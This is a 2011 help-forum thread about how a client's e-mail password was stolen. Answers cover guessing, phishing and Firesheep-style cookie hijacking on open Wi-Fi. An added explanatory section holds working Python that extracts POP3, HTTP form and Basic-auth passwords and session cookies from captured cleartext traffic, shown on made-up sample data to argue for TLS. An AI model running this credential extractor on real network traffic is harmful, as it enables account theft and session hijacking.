Solved

How was the client's e-mail password compromised?

Posted on 2011-03-08
Last Modified: 2013-11-22

One of my clients had a bit of a nightmare recently. He lost access to his Facebook account, re-attained access and then promptly lost it again. The perp posted on his wall, added his own e-mail account and then removed the client's. He posted his e-mail password on his Facebook wall.

I'm trying to ascertain what a plausible explanation is for how the client's e-mail password was compromised.

Antivirus was out of date by 5 months
Java was about 4-6 revisions behind what's current
Flash was probably 3-4 revisions behind
3 adhoc networks had been connected to in the past
E-Mail was in Outlook
Has a BlackBerry

I scanned the computer using Malwarebytes. Then I removed the HDD and scanned with Kaspersky, then Avast, then Avira. Malwarebytes found some infection fragments. The other three found bits and pieces of Java-related exploits and trojans. However, no specific keyloggers were found.

I have been trying to ascertain whether the e-mail password was compromised through the ad hoc networks, through the BlackBerry, through infection, or through physical access to the computer.
Question by:MJCS
 
LVL 82

Expert Comment

by:Dave Baldwin
ID: 35077709
You forgot guessing and looking over his shoulder.  Since the perp is taking personal and not necessarily financial actions, it's probably someone who knows him.  'Professional' thieves would more likely prefer that he didn't know he was compromised.
 
LVL 18

Expert Comment

by:Rartemass
ID: 35078550
If the password was simple then it could have been guessed. This also points to someone he knows.
This is why it's important to never use birthdays, pet names, kids' names, street names, favourite characters and movies etc.
Also, does he write the passwords down and "hide" them at his desk? Many people put a Post-it note under their keyboard with their passwords and think it's secure.
 
LVL 38

Expert Comment

by:younghv
ID: 35081430
"...or through physical access to the computer?" = or they got their hands on his BlackBerry for a couple of minutes.

People get way too casual about protecting access to their handhelds, and yet they will store information in them that is every bit as critical as what they have on their PCs.
 
LVL 2

Author Comment

by:MJCS
ID: 35083765
How easy is it to pull password info out of a BlackBerry? I know it is really easy to pull it out of a laptop. There are numerous utilities that could be downloaded and run directly or off of a USB stick.
 
LVL 38

Expert Comment

by:younghv
ID: 35085456
Very easy.
Just Google "lost blackberry password" and see all the ways you can do it.
 
LVL 2

Author Comment

by:MJCS
ID: 35085526
Do you have any specific links? When I ran that search, the general consensus seemed to be that you can reset your BlackBerry password but not retrieve it...
 
LVL 61

Expert Comment

by:btan
ID: 35114474
Probably the simple password would be one, but it can be easily siphoned as well. Check out this link; mostly the phishing attack would socially engineer the user in the form of an email with a link to their phished (spoofed) Facebook login. The user, being unaware, will enter the credentials, and all those are stored on the attacker's hosted fake website.

There would be a case for "forgot password" where the user's email account (also the Facebook user ID) would be hacked if it is using a simple password etc. The "forgot password" in Facebook will send it to the user's primary email account (in this case probably the user's Facebook user ID); the attacker got that new Facebook password. Also note that sometimes the "reminder" question in the event of forgetting the password can be easily guessed as well, e.g. who is the spouse etc., as typically the answer can be found if the user had social information widely available on the web.

Nonetheless, I understand that Facebook has a security feature in which after 25 or so logins the account is temporarily disabled; to enable the account, the account owner must reset his/her account. That may be an indirect trigger.

For the ad hoc network, you should check out Firesheep, which siphons credentials by hijacking cookies across unprotected WiFi networks in hotspots etc. It simply can log in to any Facebook account without a password. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. See this link @ http://codebutler.com/firesheep

 
LVL 1

Expert Comment

by:Tony_the_PC-Tuner
ID: 35129672
The easiest way to hijack a password is through simple phishing.

The client gets an email from someone that says "you have a new message on XYZ website (Facebook, Craigslist, whatever).  

They click on the "look alike" site, and attempt to login to their account.  Their username and password is captured, and the account is instantly compromised.  The hacker who set up the look-alike site gets an alert that he's caught a fly, goes in and changes the real password on the real account.


Start your investigation there.


Your client should go in and immediately change all remaining passwords to every other account they own- and I mean EVERYTHING; bank passwords, ebay, Amazon, whatever.  Change them now, as the hacker may be in the process of analyzing and digesting whatever they have already compromised.
 
LVL 2

Accepted Solution

by: MJCS (earned 0 total points)
ID: 35140119
I have figured this out. I have successfully tested a sniffer to intercept non-encrypted wireless traffic to accurately depict passwords on both non-encrypted websites as well as POP e-mail.

How do I close the question with no points given out?
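What the accepted solution describes, and what btan's Firesheep pointer describes, is the same passive attack seen from two angles: on an open (unencrypted) Wi-Fi network anyone in range can reassemble TCP streams and read whatever the application protocol sends in the clear. The parser below is an added example written for this page, not code from the original thread or from Firesheep. It takes already-reassembled TCP payloads (capturing and reassembling them is what tcpdump or Wireshark does) and pulls out the three things that leak in this scenario: a POP3 USER/PASS login, a plain-HTTP form login or Basic-auth header, and a session cookie that can be replayed without ever learning the password. The CAPTURE data, host names, cookie names and credentials are all constructed for the example; the field and cookie name lists are assumptions for illustration, not a complete catalogue.

```python
import base64
import re
from typing import Callable, Dict, List
from urllib.parse import parse_qs

Finding = Dict[str, str]

# Assumed, illustrative name lists; real sites use many other names.
USER_FIELDS = {"user", "username", "email", "login"}
PASSWORD_FIELDS = {"pass", "password", "passwd"}
SESSION_COOKIES = {"sessionid", "phpsessid", "jsessionid", "sid"}

# Constructed sample: reassembled TCP payloads as a sniffer sees them after
# stripping the Ethernet/IP/TCP headers, keyed by destination port.
CAPTURE = [
    # POP3 login, exactly as RFC 1939 puts it on the wire: two cleartext commands.
    (110, b"USER alice@example.test\r\nPASS hunter2\r\nSTAT\r\n"),
    # Plain-HTTP form login: the password travels URL-encoded in the body.
    (80, b"POST /login HTTP/1.1\r\n"
         b"Host: www.example.test\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 39\r\n"
         b"\r\n"
         b"email=alice%40example.test&pass=hunter2"),
    # A later request carrying the logged-in session cookie (the Firesheep case).
    (80, b"GET /home HTTP/1.1\r\n"
         b"Host: www.example.test\r\n"
         b"Cookie: sessionid=abc123; lang=en\r\n"
         b"\r\n"),
    # HTTP Basic auth is base64, not encryption: "alice:hunter2" encoded.
    (80, b"GET /inbox HTTP/1.1\r\n"
         b"Host: mail.example.test\r\n"
         b"Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
         b"\r\n"),
    # POP3 over TLS (port 995): a handshake fragment, opaque to the sniffer.
    (995, b"\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01"),
]


def parse_pop3(payload: bytes) -> List[Finding]:
    """POP3 sends USER and PASS as separate cleartext commands."""
    text = payload.decode("latin-1")
    user = re.search(r"^USER (\S+)\s*$", text, re.M)
    pw = re.search(r"^PASS (\S+)\s*$", text, re.M)
    if not (user and pw):
        return []
    return [{"kind": "pop3_login", "user": user.group(1), "password": pw.group(1)}]


def _split_http(payload: bytes):
    """Return (request line, lower-cased header dict, body) of one HTTP request."""
    text = payload.decode("latin-1")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_http(payload: bytes) -> List[Finding]:
    """Three ways a plain-HTTP request leaks access: form login, Basic auth, session cookie."""
    request_line, headers, body = _split_http(payload)
    host = headers.get("host", "")
    findings: List[Finding] = []

    if request_line.startswith("POST ") and "x-www-form-urlencoded" in headers.get("content-type", ""):
        fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
        pw_key = next((k for k in fields if k in PASSWORD_FIELDS), None)
        user_key = next((k for k in fields if k in USER_FIELDS), None)
        if pw_key:
            findings.append({"kind": "http_form_login", "host": host,
                             "user": fields[user_key] if user_key else "",
                             "password": fields[pw_key]})

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        findings.append({"kind": "http_basic_auth", "host": host, "user": user, "password": password})

    # A session cookie is enough on its own: replaying the header logs the attacker in.
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name.lower() in SESSION_COOKIES:
            findings.append({"kind": "session_cookie", "host": host, "name": name, "value": value})
    return findings


PARSERS: Dict[int, Callable[[bytes], List[Finding]]] = {110: parse_pop3, 80: parse_http}


def extract_credentials(capture) -> List[Finding]:
    """Run the cleartext parsers; TLS ports (995, 443, ...) are skipped as unreadable."""
    findings: List[Finding] = []
    for port, payload in capture:
        parser = PARSERS.get(port)
        if parser is not None:
            findings.extend(parser(payload))
    return findings


if __name__ == "__main__":
    for finding in extract_credentials(CAPTURE):
        print(finding)
```

The last CAPTURE entry is the point of the exercise: the same POP3 login sent over TLS (POP3S on 995, or STARTTLS on 110) yields nothing to this parser, which is why the fix btan names (end-to-end encryption, HTTPS or SSL/TLS for mail) is the only one that holds on a network you do not control. An Outlook profile set to plain POP3 on port 110, used on a shared ad hoc network, leaks the mailbox password to every other host in range on every mail check.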
 
LVL 18

Expert Comment

by:Rartemass
ID: 35143233
To close with no points, simply select your comment as the solution.
 
LVL 2

Author Closing Comment

by:MJCS
ID: 35174635
Nobody gave me a plausible answer but I was able eventually to duplicate the process myself, therefore answering my own question.
